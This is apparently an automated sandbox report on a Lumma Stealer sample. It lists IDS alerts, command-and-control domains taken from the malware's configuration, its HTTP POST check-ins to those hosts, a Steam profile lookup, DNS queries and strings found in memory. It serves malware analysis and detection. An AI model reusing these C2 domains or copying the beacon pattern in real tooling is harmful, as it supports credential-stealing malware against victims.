Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49721 -> 172.67.183.74:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49721 -> 172.67.183.74:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: abnomalrkmu.site
Source: Malware configuration extractor	URLs: snarlypagowo.site
Source: Malware configuration extractor	URLs: questionsmw.stor
Source: Malware configuration extractor	URLs: treatynreit.site
Source: Malware configuration extractor	URLs: absorptioniw.site
Source: Malware configuration extractor	URLs: chorusarorp.site
Source: Malware configuration extractor	URLs: soldiefieop.site
Source: Malware configuration extractor	URLs: nurserrsjwuwq.shop
Source: Malware configuration extractor	URLs: mysterisop.site

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 104.21.17.174 104.21.17.174

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: nurserrsjwuwq.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: questionsmw.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: soldiefieop.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abnomalrkmu.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: treatynreit.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: snarlypagowo.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mysterisop.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: absorptioniw.site
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gravvitywio.store

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: BitLockerToGo.exe, 00000002.00000003.2365814090.0000000003124000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=75a29d536c4b41a637f9f5c2; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34837Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 02 Oct 2024 13:11:06 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control< equals www.youtube.com (Youtube)
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: nurserrsjwuwq.shop
Source: global traffic	DNS traffic detected: DNS query: questionsmw.store
Source: global traffic	DNS traffic detected: DNS query: soldiefieop.site
Source: global traffic	DNS traffic detected: DNS query: abnomalrkmu.site
Source: global traffic	DNS traffic detected: DNS query: chorusarorp.site
Source: global traffic	DNS traffic detected: DNS query: treatynreit.site
Source: global traffic	DNS traffic detected: DNS query: snarlypagowo.site
Source: global traffic	DNS traffic detected: DNS query: mysterisop.site
Source: global traffic	DNS traffic detected: DNS query: absorptioniw.site
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: gravvitywio.store

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: nurserrsjwuwq.shop

Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: klFMCT64RF.exe	String found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
Source: klFMCT64RF.exe	String found in binary or memory: http://cevcsca2021.ocsp-certum.com07
Source: klFMCT64RF.exe	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: klFMCT64RF.exe	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: klFMCT64RF.exe	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: klFMCT64RF.exe	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: klFMCT64RF.exe	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: klFMCT64RF.exe	String found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
Source: klFMCT64RF.exe	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: klFMCT64RF.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: klFMCT64RF.exe	String found in binary or memory: http://subca.ocsp-certum.com02
Source: klFMCT64RF.exe	String found in binary or memory: http://www.certum.pl/CPS0
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: BitLockerToGo.exe, 00000002.00000003.2287992372.00000000030E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abnomalrkmu.site/
Source: BitLockerToGo.exe, 00000002.00000003.2287992372.00000000030E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abnomalrkmu.site/7
Source: BitLockerToGo.exe, 00000002.00000003.2287992372.00000000030E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abnomalrkmu.site/api
Source: BitLockerToGo.exe, 00000002.00000003.2287992372.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abnomalrkmu.site/apii
Source: BitLockerToGo.exe, 00000002.00000002.2588464715.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365955570.00000000030C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://absorptioniw.site/api
Source: BitLockerToGo.exe, 00000002.00000002.2588464715.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365955570.00000000030C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://absorptioniw.site/apiK
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2589207025.000000000313F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai
Source: BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: BitLockerToGo.exe, 00000002.00000003.2365955570.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366098659.0000000003120000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.ak
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2589207025.000000000313F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamsta
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=8vRVyaZK
Source: BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=w4s3
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=pvBDaFhF2LLJ&l=e
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
